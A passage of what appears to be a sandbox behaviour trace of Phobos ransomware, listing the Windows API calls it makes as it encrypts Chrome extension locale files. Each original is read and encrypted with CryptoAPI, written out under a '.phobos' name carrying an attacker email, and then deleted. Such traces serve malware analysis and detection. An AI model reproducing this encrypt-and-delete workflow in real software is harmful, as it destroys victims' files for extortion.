dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.900] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.901] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.901] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.901] CloseHandle (hObject=0x130) returned 1 [0151.901] CloseHandle (hObject=0x138) returned 1 [0151.901] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json")) returned 1 [0151.902] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.903] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.903] CloseHandle (hObject=0x138) returned 1 [0151.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json")) returned 0x2020 [0151.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.904] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.904] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.904] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.904] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.904] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.944] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.944] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.945] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.945] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.945] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.945] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.946] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.946] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.946] CloseHandle (hObject=0x138) returned 1 [0151.946] CloseHandle (hObject=0x130) returned 1 [0151.946] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json")) returned 1 [0151.947] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.948] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.948] CloseHandle (hObject=0x130) returned 1 [0151.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json")) returned 0x2020 [0151.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.948] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.948] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.949] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.949] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.949] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.950] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.950] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.951] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.951] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.951] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.951] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.951] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.951] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.951] CloseHandle (hObject=0x130) returned 1 [0151.951] CloseHandle (hObject=0x138) returned 1 [0151.951] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json")) returned 1 [0151.952] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.953] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.953] CloseHandle (hObject=0x138) returned 1 [0151.953] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json")) returned 0x2020 [0151.953] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.953] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.953] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.954] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.954] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.954] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.955] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.955] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.955] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.955] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.955] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.955] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.955] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.956] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.956] CloseHandle (hObject=0x138) returned 1 [0151.956] CloseHandle (hObject=0x130) returned 1 [0151.956] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json")) returned 1 [0151.957] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.957] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.957] CloseHandle (hObject=0x130) returned 1 [0151.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json")) returned 0x2020 [0151.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.957] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.958] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.958] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.958] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.958] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.959] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.959] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.960] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.960] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.960] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.960] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.960] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.960] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.960] CloseHandle (hObject=0x130) returned 1 [0151.960] CloseHandle (hObject=0x138) returned 1 [0151.969] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json")) returned 1 [0151.970] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 